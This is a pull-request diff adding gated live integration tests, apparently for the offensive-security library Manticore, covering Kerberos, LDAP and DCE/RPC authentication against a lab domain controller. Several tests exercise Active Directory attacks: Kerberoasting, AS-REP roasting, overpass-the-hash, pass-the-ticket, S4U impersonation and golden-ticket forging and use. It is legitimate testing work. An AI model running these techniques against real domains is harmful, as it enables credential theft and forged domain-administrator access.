### PR TITLE
Add live Kerberos integration test harness for the native paths (Fixes #921)

### DIFF
--- a/network/dcerpc/v5/client/auth_kerberos_integration_test.go
+++ b/network/dcerpc/v5/client/auth_kerberos_integration_test.go
@@ -1,0 +1,92 @@
+//go:build integration
+
+// Live validation of RPC-level Kerberos authentication (SetAuthKerberos) on the
+// connection-oriented DCE/RPC client, exercised against the endpoint mapper (ept)
+// over ncacn_ip_tcp. It mirrors the NTLM auth_integration_test precedent but
+// drives the native Kerberos provider: an AP-REQ in the bind's auth verifier,
+// mutual authentication, and per-PDU GSS protection (MIC for PKT/PKT_INTEGRITY,
+// Wrap for PKT_PRIVACY). Excluded from the default build by the "integration" tag.
+//
+// Configuration:
+//
+//	KRB5_TEST_KDC     KDC / domain-controller host or IP (obtains the TGT)
+//	KRB5_TEST_REALM   Kerberos realm / AD domain
+//	KRB5_TEST_USER    account sAMAccountName
+//	KRB5_TEST_PASS    account password
+//	KRB5_TEST_TARGET  RPC server FQDN (defaults to KRB5_TEST_KDC). The SPN is
+//	                  host/<target> (the RPC/host class); the transport dials the
+//	                  resolved host on TCP 135 (the endpoint mapper).
+//
+// Example:
+//
+//	KRB5_TEST_KDC=10.0.0.10 KRB5_TEST_REALM=EXAMPLE.LOCAL \
+//	KRB5_TEST_USER=Administrator KRB5_TEST_PASS='…' \
+//	KRB5_TEST_TARGET=dc.example.local \
+//	  go test -tags integration -v -run TestLiveDCERPC ./network/dcerpc/v5/client/
+package client_test
+
+import (
+	"os"
+	"testing"
+
+	epm "github.com/TheManticoreProject/Manticore/network/dcerpc/interfaces/e1af8308-5d1f-11c9-91a4-08002b14a0fa/3.0"
+	"github.com/TheManticoreProject/Manticore/network/dcerpc/interfaces/e1af8308-5d1f-11c9-91a4-08002b14a0fa/3.0/functions"
+	"github.com/TheManticoreProject/Manticore/network/dcerpc/v5/client"
+	"github.com/TheManticoreProject/Manticore/network/dcerpc/v5/pdu"
+	"github.com/TheManticoreProject/Manticore/network/dcerpc/v5/transport/tcp"
+	kerberos "github.com/TheManticoreProject/Manticore/network/kerberos/v5"
+)
+
+// TestLiveDCERPC_AuthKerberos_EptLookup binds the endpoint mapper with native
+// Kerberos at each supported auth level and issues a protected ept_lookup. The
+// response is signature-checked (and decrypted at PKT_PRIVACY) before its entries
+// are decoded, so a successful lookup proves the per-PDU verifier round-trips.
+func TestLiveDCERPC_AuthKerberos_EptLookup(t *testing.T) {
+	kdc := os.Getenv("KRB5_TEST_KDC")
+	realm := os.Getenv("KRB5_TEST_REALM")
+	user := os.Getenv("KRB5_TEST_USER")
+	pass := os.Getenv("KRB5_TEST_PASS")
+	if kdc == "" || realm == "" || user == "" || pass == "" {
+		t.Skip("set KRB5_TEST_KDC/KRB5_TEST_REALM/KRB5_TEST_USER/KRB5_TEST_PASS to run the live DCE/RPC Kerberos tests")
+	}
+	target := os.Getenv("KRB5_TEST_TARGET")
+	if target == "" {
+		target = kdc
+	}
+	spn := "host/" + target
+
+	levels := []struct {
+		name  string
+		level uint8
+	}{
+		{"CONNECT", pdu.AuthLevelConnect},
+		{"PKT", pdu.AuthLevelPkt},
+		{"PKT_INTEGRITY", pdu.AuthLevelPktIntegrity},
+		{"PKT_PRIVACY", pdu.AuthLevelPktPrivacy},
+	}
+	for _, lv := range levels {
+		t.Run(lv.name, func(t *testing.T) {
+			// A fresh Kerberos client per level; SetAuthKerberos acquires the TGT
+			// and the host/ service ticket, then builds the AP-REQ for the bind.
+			kc := kerberos.NewClient(user, realm, kdc).WithPassword(pass)
+
+			rpc := client.NewClient(tcp.New(target, tcp.EndpointMapperPort))
+			if err := rpc.SetAuthKerberos(lv.level, kc, spn); err != nil {
+				t.Fatalf("SetAuthKerberos(%s): %v", lv.name, err)
+			}
+			if err := rpc.Bind(epm.SyntaxID()); err != nil {
+				t.Fatalf("authenticated Bind(ept) at %s: %v", lv.name, err)
+			}
+			defer rpc.Close()
+
+			entries, err := functions.Lookup(rpc)
+			if err != nil {
+				t.Fatalf("[WIRE FAIL] authenticated ept_lookup at %s: %v", lv.name, err)
+			}
+			if len(entries) == 0 {
+				t.Fatalf("[WIRE FAIL] authenticated ept_lookup at %s returned no entries", lv.name)
+			}
+			t.Logf("[ok] %s: Kerberos bind + ept_lookup recovered %d endpoint-map entries", lv.name, len(entries))
+		})
+	}
+}

--- a/network/kerberos/v5/docs/INTEGRATION_TESTS.md
+++ b/network/kerberos/v5/docs/INTEGRATION_TESTS.md
@@ -1,0 +1,70 @@
+# Kerberos live integration tests
+
+The native (stdlib-only) Kerberos paths have an env-gated live test harness that
+runs against a real KDC / domain controller. Every test is behind the
+`//go:build integration` tag, so it is excluded from the default build and from
+`go test ./...`; it also **skips cleanly** when its configuration is not present
+in the environment. Running the suite without configuration is a no-op.
+
+## Configuration
+
+Baseline (drives the always-on paths across every subsystem):
+
+| Variable           | Meaning                                                        |
+| ------------------ | ------------------------------------------------------------- |
+| `KRB5_TEST_KDC`    | KDC / domain-controller host or IP (obtains the TGT)          |
+| `KRB5_TEST_REALM`  | Kerberos realm / AD domain (e.g. `EXAMPLE.LOCAL`)             |
+| `KRB5_TEST_USER`   | account sAMAccountName (e.g. `Administrator`)                  |
+| `KRB5_TEST_PASS`   | account password                                              |
+| `KRB5_TEST_SPN`    | an existing SPN the account may request (e.g. `ldap/dc.example.local`) — used by GetTGS / Kerberoast / pass-the-ticket |
+| `KRB5_TEST_TARGET` | SMB / LDAP / RPC server FQDN (defaults to `KRB5_TEST_KDC`); the SMB/LDAP/RPC SPNs are built from it, so a fully-qualified name is required |
+
+Optional (each unlocks a path a vanilla single-domain lab cannot exercise; the
+test skips when its variable is unset):
+
+| Variable                | Unlocks                                                  |
+| ----------------------- | -------------------------------------------------------- |
+| `KRB5_TEST_KEYTAB`      | keytab-based `GetTGT`                                     |
+| `KRB5_TEST_ASREP_USER`  | `ASREPRoast` (needs a pre-auth-disabled account)         |
+| `KRB5_TEST_FAST`        | FAST-armored AS-REQ (needs KDC Kerberos-armoring support) |
+| `KRB5_TEST_S4U_SPN`     | `S4U2Self` → `S4U2Proxy` (needs constrained delegation)  |
+| `KRB5_TEST_S4U_USER`    | user to impersonate for S4U (defaults to `KRB5_TEST_USER`) |
+| `KRB5_TEST_KRBTGT_KEY` + `KRB5_TEST_DOMAIN_SID` | golden-ticket forge → use       |
+| `KRB5_TEST_SMB21`       | SMB 2.1 signing (most Windows DCs reject 2.x — target a member server) |
+
+No secrets are ever committed; the harness reads everything from the environment.
+
+## Running
+
+```sh
+KRB5_TEST_KDC=10.0.0.10 \
+KRB5_TEST_REALM=EXAMPLE.LOCAL \
+KRB5_TEST_USER=Administrator \
+KRB5_TEST_PASS='…' \
+KRB5_TEST_SPN=ldap/dc.example.local \
+KRB5_TEST_TARGET=dc.example.local \
+  go test -tags integration -v \
+    ./network/kerberos/v5/... \
+    ./network/smb/smb_v20/client/ \
+    ./network/ldap/ \
+    ./network/dcerpc/v5/client/
+```
+
+## Coverage
+
+- **network/kerberos/v5** — `GetTGT` (password / NT-hash / AES-key / keytab),
+  `GetTGS`, Kerberoast, ASREPRoast, U2U, `Renew`, kirbi + ccache export→import
+  pass-the-ticket, golden forge→use, S4U2Self→S4U2Proxy, FAST-armored AS-REQ, and
+  a live PAC decode (U2U-to-self ticket decrypted with the client's TGT session
+  key, PAC parsed).
+- **network/smb/smb_v20/client** — `SessionSetupKerberos` with an SMB 3.1.1 signed
+  (AES-128-CMAC) tree connect and an AES-GCM-encrypted tree connect, plus a gated
+  SMB 2.1 (HMAC-SHA256) signing test.
+- **network/ldap** — GSSAPI/Kerberos bind with the integrity (sign) and
+  confidentiality (seal) security layers, each followed by a real search.
+- **network/dcerpc/v5/client** — `SetAuthKerberos` at CONNECT / PKT /
+  PKT_INTEGRITY / PKT_PRIVACY, each with a protected `ept_lookup` against the
+  endpoint mapper.
+
+Cross-realm and PKINIT paths are intentionally out of scope for a single-domain
+lab and are not exercised here.

--- a/network/kerberos/v5/live_integration_test.go
+++ b/network/kerberos/v5/live_integration_test.go
@@ -1,0 +1,391 @@
+//go:build integration
+
+// Live integration coverage for the native (stdlib-only) Kerberos v5 client
+// against a real KDC / domain controller. Excluded from the default build by the
+// "integration" tag; every test skips cleanly when its configuration is not
+// provided in the environment, so `go test -tags integration ./...` is a no-op
+// unless a lab is configured.
+//
+// Baseline configuration (drives the always-on paths):
+//
+//	KRB5_TEST_KDC     KDC / domain-controller host or IP (e.g. 10.0.0.10)
+//	KRB5_TEST_REALM   Kerberos realm / AD domain (e.g. EXAMPLE.LOCAL)
+//	KRB5_TEST_USER    account sAMAccountName (e.g. Administrator)
+//	KRB5_TEST_PASS    account password
+//	KRB5_TEST_SPN     a service principal name that exists in the domain and the
+//	                  account may request (e.g. ldap/dc.example.local). Used for
+//	                  GetTGS / Kerberoast.
+//
+// Optional configuration (each unlocks a path that a vanilla single-domain lab
+// cannot exercise; the test skips when the variable is unset):
+//
+//	KRB5_TEST_KEYTAB       path to a .keytab for the account (keytab GetTGT)
+//	KRB5_TEST_ASREP_USER   an account with pre-authentication disabled (ASREPRoast)
+//	KRB5_TEST_FAST         set to 1 to exercise the FAST-armored AS-REQ (requires
+//	                       the KDC to advertise Kerberos armoring)
+//	KRB5_TEST_S4U_SPN      target SPN the account is trusted to delegate to
+//	                       (S4U2Self -> S4U2Proxy constrained delegation)
+//	KRB5_TEST_S4U_USER     user to impersonate for S4U (defaults to KRB5_TEST_USER)
+//	KRB5_TEST_KRBTGT_KEY   krbtgt AES256 (or RC4) key, hex, for the golden-ticket
+//	                       forge->use path
+//	KRB5_TEST_DOMAIN_SID   account-domain SID (for golden forge)
+//
+// Example:
+//
+//	KRB5_TEST_KDC=10.0.0.10 KRB5_TEST_REALM=EXAMPLE.LOCAL \
+//	KRB5_TEST_USER=Administrator KRB5_TEST_PASS='…' \
+//	KRB5_TEST_SPN=ldap/dc.example.local \
+//	  go test -tags integration -v -run TestLiveKerberos ./network/kerberos/v5/
+package kerberos_test
+
+import (
+	"encoding/hex"
+	"os"
+	"strings"
+	"testing"
+
+	kerberos "github.com/TheManticoreProject/Manticore/network/kerberos/v5"
+	kerbcrypto "github.com/TheManticoreProject/Manticore/network/kerberos/v5/crypto"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/messages"
+)
+
+// krbEnv holds the resolved baseline configuration.
+type krbEnv struct {
+	KDC   string
+	Realm string
+	User  string
+	Pass  string
+	SPN   string
+}
+
+// requireKrbEnv returns the baseline Kerberos test configuration, skipping the
+// test if the mandatory variables are not all set.
+func requireKrbEnv(t *testing.T) krbEnv {
+	t.Helper()
+	e := krbEnv{
+		KDC:   os.Getenv("KRB5_TEST_KDC"),
+		Realm: os.Getenv("KRB5_TEST_REALM"),
+		User:  os.Getenv("KRB5_TEST_USER"),
+		Pass:  os.Getenv("KRB5_TEST_PASS"),
+		SPN:   os.Getenv("KRB5_TEST_SPN"),
+	}
+	if e.KDC == "" || e.Realm == "" || e.User == "" || e.Pass == "" {
+		t.Skip("set KRB5_TEST_KDC/KRB5_TEST_REALM/KRB5_TEST_USER/KRB5_TEST_PASS to run the live Kerberos tests")
+	}
+	return e
+}
+
+// newClient builds a password-authenticated client for the baseline account.
+func (e krbEnv) newClient() *kerberos.KerberosClient {
+	return kerberos.NewClient(e.User, e.Realm, e.KDC).WithPassword(e.Pass)
+}
+
+// TestLiveKerberos_GetTGT_Password obtains a TGT with a password.
+func TestLiveKerberos_GetTGT_Password(t *testing.T) {
+	e := requireKrbEnv(t)
+	c := e.newClient()
+	if err := c.GetTGT(); err != nil {
+		t.Fatalf("GetTGT(password): %v", err)
+	}
+	if !c.HasTGT() {
+		t.Fatal("GetTGT(password) reported success but HasTGT() is false")
+	}
+	t.Logf("[ok] TGT acquired for %s@%s", c.Username(), c.Realm())
+}
+
+// TestLiveKerberos_GetTGT_NTHash derives the account's RC4 (NT) key from the
+// password and obtains a TGT with it (overpass-the-hash).
+func TestLiveKerberos_GetTGT_NTHash(t *testing.T) {
+	e := requireKrbEnv(t)
+	ntKey, err := kerbcrypto.StringToKey(messages.ETypeRC4HMAC, e.Pass, "", nil)
+	if err != nil {
+		t.Fatalf("derive NT hash: %v", err)
+	}
+	c := kerberos.NewClient(e.User, e.Realm, e.KDC)
+	if err := c.WithNTHash(hex.EncodeToString(ntKey)); err != nil {
+		t.Fatalf("WithNTHash: %v", err)
+	}
+	if err := c.GetTGT(); err != nil {
+		t.Fatalf("GetTGT(NT hash): %v", err)
+	}
+	t.Logf("[ok] TGT acquired from NT hash for %s", c.Username())
+}
+
+// TestLiveKerberos_GetTGT_AESKey derives the account's AES256 key from the
+// password with the default AD salt (REALM+username) and obtains a TGT with it
+// (pass-the-key).
+func TestLiveKerberos_GetTGT_AESKey(t *testing.T) {
+	e := requireKrbEnv(t)
+	salt := strings.ToUpper(e.Realm) + e.User
+	aesKey, err := kerbcrypto.StringToKey(messages.ETypeAES256CTSHMACSHA196, e.Pass, salt, nil)
+	if err != nil {
+		t.Fatalf("derive AES256 key: %v", err)
+	}
+	c := kerberos.NewClient(e.User, e.Realm, e.KDC)
+	if err := c.WithAESKey(hex.EncodeToString(aesKey)); err != nil {
+		t.Fatalf("WithAESKey: %v", err)
+	}
+	if err := c.GetTGT(); err != nil {
+		t.Fatalf("GetTGT(AES key): %v (the default salt REALM+username may not match this account)", err)
+	}
+	t.Logf("[ok] TGT acquired from AES256 key for %s", c.Username())
+}
+
+// TestLiveKerberos_GetTGT_Keytab obtains a TGT from a keytab. Skipped unless
+// KRB5_TEST_KEYTAB points at a keytab for the account.
+func TestLiveKerberos_GetTGT_Keytab(t *testing.T) {
+	e := requireKrbEnv(t)
+	path := os.Getenv("KRB5_TEST_KEYTAB")
+	if path == "" {
+		t.Skip("set KRB5_TEST_KEYTAB to a .keytab for the account to run the keytab TGT test")
+	}
+	c := kerberos.NewClient(e.User, e.Realm, e.KDC)
+	if err := c.WithKeytabFile(path); err != nil {
+		t.Fatalf("WithKeytabFile: %v", err)
+	}
+	if err := c.GetTGT(); err != nil {
+		t.Fatalf("GetTGT(keytab): %v", err)
+	}
+	t.Logf("[ok] TGT acquired from keytab for %s", c.Username())
+}
+
+// TestLiveKerberos_GetTGS requests a service ticket for KRB5_TEST_SPN.
+func TestLiveKerberos_GetTGS(t *testing.T) {
+	e := requireKrbEnv(t)
+	if e.SPN == "" {
+		t.Skip("set KRB5_TEST_SPN to a service principal name to run the GetTGS test")
+	}
+	c := e.newClient()
+	if err := c.GetTGT(); err != nil {
+		t.Fatalf("GetTGT: %v", err)
+	}
+	ticket, ticketRaw, key, keyEType, err := c.GetTGS(e.SPN, true)
+	if err != nil {
+		t.Fatalf("GetTGS(%q): %v", e.SPN, err)
+	}
+	if len(ticketRaw) == 0 || len(key) == 0 {
+		t.Fatalf("GetTGS(%q) returned empty ticket/key", e.SPN)
+	}
+	t.Logf("[ok] service ticket for %s: sname=%v keyEType=%d", e.SPN, ticket.SName.NameString, keyEType)
+}
+
+// TestLiveKerberos_Kerberoast roasts KRB5_TEST_SPN (returns the service ticket's
+// encrypted part for offline cracking).
+func TestLiveKerberos_Kerberoast(t *testing.T) {
+	e := requireKrbEnv(t)
+	if e.SPN == "" {
+		t.Skip("set KRB5_TEST_SPN to run the Kerberoast test")
+	}
+	c := e.newClient()
+	if err := c.GetTGT(); err != nil {
+		t.Fatalf("GetTGT: %v", err)
+	}
+	res, err := c.Kerberoast(e.SPN)
+	if err != nil {
+		t.Fatalf("Kerberoast(%q): %v", e.SPN, err)
+	}
+	if len(res.Cipher) == 0 {
+		t.Fatalf("Kerberoast(%q) returned no cipher text", e.SPN)
+	}
+	t.Logf("[ok] roasted %s: etype=%d cipherLen=%d", res.SPN, res.EType, len(res.Cipher))
+}
+
+// TestLiveKerberos_ASREPRoast roasts a pre-auth-disabled account. Skipped unless
+// KRB5_TEST_ASREP_USER names such an account (a vanilla domain has none).
+func TestLiveKerberos_ASREPRoast(t *testing.T) {
+	e := requireKrbEnv(t)
+	user := os.Getenv("KRB5_TEST_ASREP_USER")
+	if user == "" {
+		t.Skip("set KRB5_TEST_ASREP_USER to a pre-auth-disabled account to run the ASREPRoast test")
+	}
+	res, err := kerberos.ASREPRoast(user, e.Realm, e.KDC)
+	if err != nil {
+		t.Fatalf("ASREPRoast(%q): %v", user, err)
+	}
+	if len(res.CipherText) == 0 {
+		t.Fatalf("ASREPRoast(%q) returned no cipher text", user)
+	}
+	t.Logf("[ok] AS-REP roast %s: etype=%d cipherLen=%d", res.Username, res.EncryptionType, len(res.CipherText))
+}
+
+// TestLiveKerberos_ExportImportKirbi exports the TGT as a .kirbi (KRB-CRED),
+// imports it into a fresh client that holds no secret, and uses it to obtain a
+// service ticket (pass-the-ticket).
+func TestLiveKerberos_ExportImportKirbi(t *testing.T) {
+	e := requireKrbEnv(t)
+	if e.SPN == "" {
+		t.Skip("set KRB5_TEST_SPN to run the kirbi export/import pass-the-ticket test")
+	}
+	c := e.newClient()
+	if err := c.GetTGT(); err != nil {
+		t.Fatalf("GetTGT: %v", err)
+	}
+	kirbi, err := c.ExportTGTKirbi()
+	if err != nil {
+		t.Fatalf("ExportTGTKirbi: %v", err)
+	}
+
+	ptt := kerberos.NewClient(e.User, e.Realm, e.KDC) // no password/hash
+	if err := ptt.LoadTGTFromKirbiBytes(kirbi); err != nil {
+		t.Fatalf("LoadTGTFromKirbiBytes: %v", err)
+	}
+	if !ptt.HasTGT() {
+		t.Fatal("imported client has no TGT")
+	}
+	if _, _, _, _, err := ptt.GetTGS(e.SPN, true); err != nil {
+		t.Fatalf("GetTGS with imported kirbi TGT: %v", err)
+	}
+	t.Logf("[ok] kirbi export -> import -> pass-the-ticket GetTGS(%s)", e.SPN)
+}
+
+// TestLiveKerberos_ExportImportCCache exports the TGT as an MIT ccache, marshals
+// it, re-parses and imports it into a fresh client, and uses it (pass-the-ticket).
+func TestLiveKerberos_ExportImportCCache(t *testing.T) {
+	e := requireKrbEnv(t)
+	if e.SPN == "" {
+		t.Skip("set KRB5_TEST_SPN to run the ccache export/import pass-the-ticket test")
+	}
+	c := e.newClient()
+	if err := c.GetTGT(); err != nil {
+		t.Fatalf("GetTGT: %v", err)
+	}
+	cc, err := c.ExportTGTCCache()
+	if err != nil {
+		t.Fatalf("ExportTGTCCache: %v", err)
+	}
+	blob, err := cc.Marshal()
+	if err != nil {
+		t.Fatalf("ccache Marshal: %v", err)
+	}
+
+	ptt := kerberos.NewClient(e.User, e.Realm, e.KDC)
+	if err := ptt.LoadTGTFromCCacheBytes(blob); err != nil {
+		t.Fatalf("LoadTGTFromCCacheBytes: %v", err)
+	}
+	if _, _, _, _, err := ptt.GetTGS(e.SPN, true); err != nil {
+		t.Fatalf("GetTGS with imported ccache TGT: %v", err)
+	}
+	t.Logf("[ok] ccache export -> import -> pass-the-ticket GetTGS(%s)", e.SPN)
+}
+
+// TestLiveKerberos_S4U exercises S4U2Self followed by S4U2Proxy (constrained
+// delegation). Skipped unless KRB5_TEST_S4U_SPN names a target the account is
+// trusted to delegate to (msDS-AllowedToDelegateTo) — not present on a vanilla
+// domain.
+func TestLiveKerberos_S4U(t *testing.T) {
+	e := requireKrbEnv(t)
+	targetSPN := os.Getenv("KRB5_TEST_S4U_SPN")
+	if targetSPN == "" {
+		t.Skip("set KRB5_TEST_S4U_SPN (a constrained-delegation target) to run the S4U test")
+	}
+	impersonate := os.Getenv("KRB5_TEST_S4U_USER")
+	if impersonate == "" {
+		impersonate = e.User
+	}
+	c := e.newClient()
+	if err := c.GetTGT(); err != nil {
+		t.Fatalf("GetTGT: %v", err)
+	}
+	_, selfRaw, _, err := c.S4U2Self(impersonate, e.Realm)
+	if err != nil {
+		t.Fatalf("S4U2Self(%q): %v", impersonate, err)
+	}
+	ticket, proxyRaw, _, err := c.S4U2Proxy(targetSPN, selfRaw)
+	if err != nil {
+		t.Fatalf("S4U2Proxy(%q): %v", targetSPN, err)
+	}
+	if len(proxyRaw) == 0 {
+		t.Fatalf("S4U2Proxy(%q) returned empty ticket", targetSPN)
+	}
+	t.Logf("[ok] S4U2Self(%s) -> S4U2Proxy(%s): sname=%v", impersonate, targetSPN, ticket.SName.NameString)
+}
+
+// TestLiveKerberos_GoldenForgeUse forges a golden TGT from the krbtgt key and
+// uses it to obtain a real service ticket from the KDC. Skipped unless the krbtgt
+// key and domain SID are supplied (a vanilla lab operator does not hand them out).
+func TestLiveKerberos_GoldenForgeUse(t *testing.T) {
+	e := requireKrbEnv(t)
+	keyHex := os.Getenv("KRB5_TEST_KRBTGT_KEY")
+	domainSID := os.Getenv("KRB5_TEST_DOMAIN_SID")
+	if keyHex == "" || domainSID == "" || e.SPN == "" {
+		t.Skip("set KRB5_TEST_KRBTGT_KEY, KRB5_TEST_DOMAIN_SID and KRB5_TEST_SPN to run the golden forge->use test")
+	}
+	key, err := hex.DecodeString(keyHex)
+	if err != nil {
+		t.Fatalf("decode KRB5_TEST_KRBTGT_KEY: %v", err)
+	}
+	keyEType := messages.ETypeAES256CTSHMACSHA196
+	if len(key) == 16 {
+		keyEType = messages.ETypeRC4HMAC
+	}
+	forged, err := kerberos.ForgeGolden(kerberos.ForgeOptions{
+		Realm:           e.Realm,
+		Username:        e.User,
+		DomainSID:       domainSID,
+		UserRID:         500,
+		LogonDomainName: strings.SplitN(strings.ToUpper(e.Realm), ".", 2)[0],
+		Key:             key,
+		KeyEType:        keyEType,
+	})
+	if err != nil {
+		t.Fatalf("ForgeGolden: %v", err)
+	}
+	c := kerberos.NewClient(e.User, e.Realm, e.KDC)
+	if err := c.LoadTGTFromKirbiBytes(mustKirbi(t, forged)); err != nil {
+		t.Fatalf("import forged golden TGT: %v", err)
+	}
+	if _, _, _, _, err := c.GetTGS(e.SPN, true); err != nil {
+		t.Fatalf("GetTGS with forged golden TGT: %v", err)
+	}
+	t.Logf("[ok] golden TGT forged and used to obtain %s", e.SPN)
+}
+
+func mustKirbi(t *testing.T, f *kerberos.ForgedTicket) []byte {
+	t.Helper()
+	b, err := f.KirbiBytes()
+	if err != nil {
+		t.Fatalf("KirbiBytes: %v", err)
+	}
+	return b
+}
+
+// TestLiveKerberos_FAST obtains a TGT over a FAST-armored AS-REQ (RFC 6113),
+// armoring with a second TGT for the same account. Skipped unless KRB5_TEST_FAST
+// is set (Kerberos armoring is not enabled on a vanilla KDC).
+func TestLiveKerberos_FAST(t *testing.T) {
+	e := requireKrbEnv(t)
+	if os.Getenv("KRB5_TEST_FAST") == "" {
+		t.Skip("set KRB5_TEST_FAST=1 to run the FAST-armored AS-REQ test (requires KDC armoring support)")
+	}
+	armor := e.newClient()
+	if err := armor.GetTGT(); err != nil {
+		t.Fatalf("armor GetTGT: %v", err)
+	}
+	c := e.newClient().WithFASTArmorFromClient(armor)
+	if !c.FASTEnabled() {
+		t.Fatal("FASTEnabled() is false after WithFASTArmorFromClient")
+	}
+	if err := c.GetTGT(); err != nil {
+		t.Fatalf("GetTGT(FAST): %v", err)
+	}
+	t.Logf("[ok] FAST-armored TGT acquired for %s", c.Username())
+}
+
+// TestLiveKerberos_Renew acquires a renewable TGT and renews it.
+func TestLiveKerberos_Renew(t *testing.T) {
+	e := requireKrbEnv(t)
+	c := e.newClient()
+	if err := c.GetTGT(); err != nil {
+		t.Fatalf("GetTGT: %v", err)
+	}
+	if err := c.Renew(); err != nil {
+		t.Fatalf("Renew: %v", err)
+	}
+	// The renewed TGT must still be usable for a TGS exchange.
+	if e.SPN != "" {
+		if _, _, _, _, err := c.GetTGS(e.SPN, true); err != nil {
+			t.Fatalf("GetTGS after Renew: %v", err)
+		}
+	}
+	t.Logf("[ok] TGT renewed and still usable")
+}

--- a/network/kerberos/v5/live_u2u_pac_integration_test.go
+++ b/network/kerberos/v5/live_u2u_pac_integration_test.go
@@ -1,0 +1,106 @@
+//go:build integration
+
+// White-box live coverage for the two native-Kerberos paths that need access to
+// the client's internal TGT state: a user-to-user (U2U) TGS exchange and PAC
+// decoding of the resulting ticket. Both use the baseline KRB5_TEST_* config (see
+// live_integration_test.go). Excluded from the default build by the "integration"
+// tag.
+//
+// The U2U ticket to the account itself is encrypted under the client's own TGT
+// session key (ENC-TKT-IN-SKEY), so the test can decrypt the ticket enc-part,
+// recover the AD-IF-RELEVANT -> AD-WIN2K-PAC element, and decode the PAC — a
+// genuine end-to-end PAC decode against a live KDC.
+package kerberos
+
+import (
+	"encoding/asn1"
+	"os"
+	"testing"
+
+	kerbcrypto "github.com/TheManticoreProject/Manticore/network/kerberos/v5/crypto"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/messages"
+	"github.com/TheManticoreProject/Manticore/network/kerberos/v5/pac"
+)
+
+// liveBaseline mirrors requireKrbEnv for the white-box package.
+func liveBaseline(t *testing.T) (kdc, realm, user, pass string) {
+	t.Helper()
+	kdc = os.Getenv("KRB5_TEST_KDC")
+	realm = os.Getenv("KRB5_TEST_REALM")
+	user = os.Getenv("KRB5_TEST_USER")
+	pass = os.Getenv("KRB5_TEST_PASS")
+	if kdc == "" || realm == "" || user == "" || pass == "" {
+		t.Skip("set KRB5_TEST_KDC/KRB5_TEST_REALM/KRB5_TEST_USER/KRB5_TEST_PASS to run the live Kerberos tests")
+	}
+	return
+}
+
+// TestLiveKerberos_U2UAndPACDecode performs a U2U TGS exchange targeting the
+// account itself, then decrypts the issued ticket with the client's TGT session
+// key and decodes the embedded PAC.
+func TestLiveKerberos_U2UAndPACDecode(t *testing.T) {
+	kdc, realm, user, pass := liveBaseline(t)
+	c := NewClient(user, realm, kdc).WithPassword(pass)
+	if err := c.GetTGT(); err != nil {
+		t.Fatalf("GetTGT: %v", err)
+	}
+
+	// Present the client's own TGT as the additional ticket; the KDC issues a
+	// service ticket to the account encrypted under the TGT session key.
+	ticket, ticketRaw, key, err := c.GetTGSU2U(user, "", c.tgtTicketRaw)
+	if err != nil {
+		t.Fatalf("GetTGSU2U(self): %v", err)
+	}
+	if len(ticketRaw) == 0 || len(key) == 0 {
+		t.Fatal("GetTGSU2U(self) returned an empty ticket/key")
+	}
+	t.Logf("[ok] U2U ticket to self: sname=%v", ticket.SName.NameString)
+
+	// The ticket enc-part is encrypted under the TGT session key (usage 2).
+	plain, err := kerbcrypto.Decrypt(c.sessionEType, c.sessionKey, kerbcrypto.KeyUsageKDCRepTicket, ticket.EncPart.Cipher)
+	if err != nil {
+		t.Fatalf("decrypt U2U ticket enc-part with TGT session key: %v", err)
+	}
+	var enc messages.EncTicketPart
+	if _, err := enc.Unmarshal(plain); err != nil {
+		t.Fatalf("parse EncTicketPart: %v", err)
+	}
+
+	pacBytes := extractPACBytes(t, enc.AuthorizationData)
+	if pacBytes == nil {
+		t.Fatal("no AD-WIN2K-PAC found in the U2U ticket authorization data")
+	}
+
+	p, err := pac.Parse(pacBytes)
+	if err != nil {
+		t.Fatalf("pac.Parse: %v", err)
+	}
+	info, err := p.LogonInfo()
+	if err != nil {
+		t.Fatalf("pac.LogonInfo: %v", err)
+	}
+	if info.UserName() == "" {
+		t.Fatal("decoded PAC logon-info has an empty EffectiveName")
+	}
+	t.Logf("[ok] decoded live PAC: user=%q rid=%d groups=%d", info.UserName(), info.UserRID(), info.GroupCount)
+}
+
+// extractPACBytes walks the AD-IF-RELEVANT wrapper for the AD-WIN2K-PAC element.
+func extractPACBytes(t *testing.T, ad []messages.AuthorizationData) []byte {
+	t.Helper()
+	for _, e := range ad {
+		if e.ADType != adTypeIfRelevant {
+			continue
+		}
+		var inner []messages.AuthorizationData
+		if _, err := asn1.Unmarshal(e.ADData, &inner); err != nil {
+			t.Fatalf("unwrap AD-IF-RELEVANT: %v", err)
+		}
+		for _, ie := range inner {
+			if ie.ADType == adTypeWin2KPAC {
+				return ie.ADData
+			}
+		}
+	}
+	return nil
+}

--- a/network/ldap/kerberos_gssapi_integration_test.go
+++ b/network/ldap/kerberos_gssapi_integration_test.go
@@ -1,0 +1,125 @@
+//go:build integration
+
+// Live integration coverage for the native (stdlib-only) GSSAPI/Kerberos LDAP
+// bind against a real domain controller, with the RFC 4752 integrity (signing)
+// and confidentiality (sealing) security layers, each followed by a real search.
+// Excluded from the default build by the "integration" tag; skipped unless the
+// environment is configured.
+//
+// Configuration:
+//
+//	KRB5_TEST_KDC     KDC / domain-controller host or IP
+//	KRB5_TEST_REALM   Kerberos realm / AD domain
+//	KRB5_TEST_USER    account sAMAccountName
+//	KRB5_TEST_PASS    account password
+//	KRB5_TEST_TARGET  LDAP server FQDN (defaults to KRB5_TEST_KDC). The DC is both
+//	                  the LDAP server and the KDC; the SPN is ldap/<target>, so a
+//	                  fully-qualified name is required.
+//
+// Example:
+//
+//	KRB5_TEST_KDC=10.0.0.10 KRB5_TEST_REALM=EXAMPLE.LOCAL \
+//	KRB5_TEST_USER=Administrator KRB5_TEST_PASS='…' \
+//	KRB5_TEST_TARGET=dc.example.local \
+//	  go test -tags integration -v -run TestLiveLDAP ./network/ldap/
+package ldap_test
+
+import (
+	"os"
+	"testing"
+
+	"github.com/TheManticoreProject/Manticore/network/ldap"
+	"github.com/TheManticoreProject/Manticore/windows/credentials"
+)
+
+type ldapEnv struct {
+	Realm  string
+	User   string
+	Pass   string
+	Target string
+}
+
+func requireLDAPEnv(t *testing.T) ldapEnv {
+	t.Helper()
+	kdc := os.Getenv("KRB5_TEST_KDC")
+	e := ldapEnv{
+		Realm:  os.Getenv("KRB5_TEST_REALM"),
+		User:   os.Getenv("KRB5_TEST_USER"),
+		Pass:   os.Getenv("KRB5_TEST_PASS"),
+		Target: os.Getenv("KRB5_TEST_TARGET"),
+	}
+	if kdc == "" || e.Realm == "" || e.User == "" || e.Pass == "" {
